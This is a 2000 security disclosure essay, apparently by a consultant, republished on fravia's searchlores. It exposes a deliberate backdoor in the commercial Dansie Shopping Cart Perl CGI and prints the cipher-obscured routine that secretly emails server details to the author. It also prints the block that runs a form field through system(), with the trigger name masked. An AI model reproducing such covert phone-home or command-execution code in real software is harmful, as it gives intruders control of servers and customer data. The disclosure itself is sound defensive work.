~ Malwares ~
| |
|
 |
|
Malwares |
(Courtesy of fravia's advanced searching
lores)
Trojanized Commercial Shopping Cart
by joeATblarg.net
published at fravia's searchlores in
April 2000
I was quite interested by this short 'erudite' reversing
essay, that I found on my old messageboard in April. I think that it will be quite
useful as 'eye-opener' for all those that don't understand WHY software reverse engineering
is so important AS DEFENCE, and why it should INCENTIVATED, instead than forbidden.
Or do you
really want a future where any bastard can sniff your box without being detected?
Trojanized Commercial Shopping Cart
===============================================================
Dansie Shopping Cart
Version : 3.04 (presumably earlier versions as well)
Author : Craig Dansie
URL :
http://www.dansie.net/
Language : Perl (both NT and Unix platforms are vulnerable)
License : Commercial, starting at $150.00
Copyright Dec 10, 1997-2000, Dansie Website
Design
Synopsis : This program -deliberately- allows arbitrary commands to be
executed on the victim server.
One of our clients, while installing and
configuring the Dansie Shopping
Cart, ran into difficulty integrating PGP, the shopping cart
program, and
our secure server setup. While trying to assist our client with the cart
and
PGP configuration we discovered a couple of things.
The CGI, under certain conditions,
sends an email to the author of the
Dansie shopping cart software, 'tech@dansie.net'. This is
not readily
apparent as the code that handles this transaction incorporates a simple
Caesar Cipher to hide the email address. The cipher is handled via the
subroutine
'there2':
------
sub there2
{
$_ = "$_[0]";
tr/a-z0-9/gvibn9wprud2lmx8z3fa4eq15oy06sjc7kth/;
tr/_/-/;
tr/\@/\./;
return $_;
}
-------
The call that creates this email address and sends the mail is the
function 'there3'.
-------
sub there3
{
if (($ENV{'OS'} !~ /Windows_NT/i)
&& ($mailprog) && (-e "$mailprog"))
{
$a =
&there2('8v59')."\@".&there2('kte3cv').".".&there2('ev8');
$b = &there2('8v59_3jhhzi8');
pop(@there2);
pop(@there2);
$c = &there2("@there2");
open (TECH, "|$mailprog
$a");
print TECH "To: $a\n";
print TECH "From: $a\n";
print TECH "Subject: $b\n\n";
print TECH "$path3\n";
print TECH "$ENV{'HTTP_HOST'} $ENV{'SERVER_NAME'}\n";
print
TECH "$c\n";
print TECH "$e $there\n" if ($e);
close (TECH);
}
}
-------
The ciphered strings, when passed through 'there2', result in:
8v59 == tech
kte3cv == dansie
ev8 == net
8v59_3jhhzi8 == tech-support
$a == tech@dansie.net
$b == Subject: tech-support
This seems curious, but plausible reasons could include
insuring License
compliance, or maybe the cart automatically sends this email when an error
occurs. The program definitely goes out of its way to hide the fact that the
mail is
being sent.
While going through the rest of the code we discovered a much more
interesting item.
(We've masked out the actual trigger element with question marks)
----------
if ( ( ( $FORM{'?????????'}) && ($ENV{'HTTP_HOST'} !~ /($d)/) ) || (
($FORM{'?????????'} ) && (!$d) ) )
{
if ( $ENV{'OS'} )
{
system("$FORM{'?????????'}");
}
else
{
new Object ;
}
exit;
}
---------
The form element '?????????', which was originally a
pseudo-random appearing
nine digit string of letters and numbers, allows an intruder to
execute any
command on the server with the same privileges as the CGI process itself.
Although this is a full disclosure list, the trigger element is obscured to
prevent the
script kiddies from running away with this back door. If you
own the cart, then you have
access to the source code and can discover the
element in question easily enough on your own.
Further searches through the code reveal that this form element is immune
to data
validation - it gets passed into this code fragment unchallenged.
The '$d' variable of
the condition which permits the back door to function
is set elsewhere in the program to
contain the string 'dansie'. (Again,
using the ciphertext algorithm) This indicates that the
form element won't
work on Dansie's own host, but will work on anyone elses. There are
additional problems with the 'there' function but we'll leave them as
exercises for the
reader to decipher.
Dansie.net, armed with the server name and URL to the CGI executable
provided by the cloaked email routine, would be able to run commands on any
web server on
the Internet that has the Dansie Shopping Cart installed. It
takes little imagination to
dream up the potential havoc and privacy
violations this level of access could result in;
from stealing private
customer records to a full-blown crack of an E-Commerce server.
When checking to see if this was a known issue, the following post from
"Kasey Johns"
, made a little over a week ago,
was discovered in
alt.comp.perlcgi.freelance:
http://www.deja.com/getdoc.xp?AN=601644315
Follow-up
article: http://www.deja.com/getdoc.xp?AN=601857849
We won't quote Kasey's posts here, in
brief, Kasey also discovered the back
door and cloaked email routines. Kasey also provides
evidence in the post to
indicate that not only is Dansie well aware of the back door routine,
but
may be actively attempting to utilize it.
Based upon our own investigation, the
information Kasey posted, and our own
firewall logs (see below), it is our opinion that the
back door within
Dansie.net's shopping cart can best be summarized as follows:
1. The
back door is very deliberate.
2. It isn't unique to the one copy we have access to here.
3. *Is being actively utilized by the author of the CGI.
* Based upon the log snippet
in Kasey's post showing attempted access to
the CGI from an Earthlink dial-up IP.
(209.179.141.0/24). According to
Kasey, access to the CGI was attempted less than 30 minutes
after the cart
was installed.
When we noticed the attempted usage of Kasey's server,
a quick check of our
own firewall logs revealed the following:
Packet log: input
REJECT eth0 PROTO=6 209.179.141.xx:1054 x.x.x.x:80
{repeated several dozen times}
We
can only assume these attempts, made from the same /24 on Earthlink's
dial-ups as the one
used to probe Kasey's server, were from the author of
the shopping cart.
We will not
try to hazard a guess as to why Dansie.net felt the need to
include a back door within their
shopping cart software. Whatever their
reasoning may be, it is our opinion that no reason, no
matter how well
thought out or rationalized, justifies the existence of this back door. No
reasoning can possibly explain away a routine that deliberately allows an
intruder
unrestricted and unauthorized access to any server on the Internet
that has the Dansie
Shopping Cart installed.